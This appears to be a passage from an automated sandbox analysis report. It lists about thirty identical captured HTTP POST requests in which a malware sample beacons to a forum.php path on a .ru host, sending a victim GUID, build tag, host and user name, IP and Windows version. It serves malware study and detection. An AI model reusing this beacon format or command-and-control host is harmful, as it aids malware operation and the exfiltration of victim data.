computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
